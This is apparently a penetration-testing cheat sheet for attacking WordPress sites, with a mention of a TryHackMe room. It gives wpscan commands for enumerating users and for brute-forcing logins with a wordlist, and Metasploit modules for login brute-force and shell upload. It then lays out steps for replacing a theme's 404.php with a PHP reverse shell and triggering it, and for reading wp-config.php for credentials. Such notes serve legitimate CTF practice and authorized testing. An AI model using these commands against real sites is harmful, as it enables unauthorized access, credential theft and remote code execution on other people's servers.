Wordpress

• Brute-force http://$IP/wp-admin, http://$IP/wp-login.php

  Copy

  # Extract users, version
  wpscan --url http://$IP --enumerate
  # Brute-force creds (user: admin)
  wpscan --url http://$IP --wordlist rockyou.txt --username $USERS --max-threads 3
  # Ignore the SSL cert errordisable-tls-check
  wpscan -–url https://$IP disable-tls-check

• Metasploit

  • brute-force: msf > use auxiliary/scanner/http/wordpress_login_enum

• Check http://$IP/wp-content/themes, http://$IP/wp-content/uploads

• Possible attack vectors:

  • After login, upload php reverse shell in 404.php of a theme (wp-content/themes/twentynineteen/404.php)

  • msf > use exploit/unix/webapp/wp_admin_shell_upload

  • Upload malicious plugins in zip

• Check interesting files: /var/www/wp-config.php

• Check plugins’ vulnerability

  • WordPress Plugin User Role Editor (https://www.exploit-db.com/exploits/44595): THM-Jack

Where uploads are stored

<base URL>/wp-content/uploads/<yyyy>/<mm>/<file name>

e.g.

WordPress Enumeration

wpscan --url <url> -e vt,tt,u,ap -o wpscan.log

WordPress Bruteforcing

wpscan --url <url> --wordlist <wordlist> --username <username>

Navigate to:

Appearance (left-hand side) > Editor (left-hand side) > 404 Template (right-hand side)

Spawn Shell From WP Admin Access

Replace the PHP there with malicious shell spawning PHP (e.g. pentestmonkey php reverse shell script)

Browse to http://<site_name>/wp-content/themes/<theme_name>/404.php to trigger the payload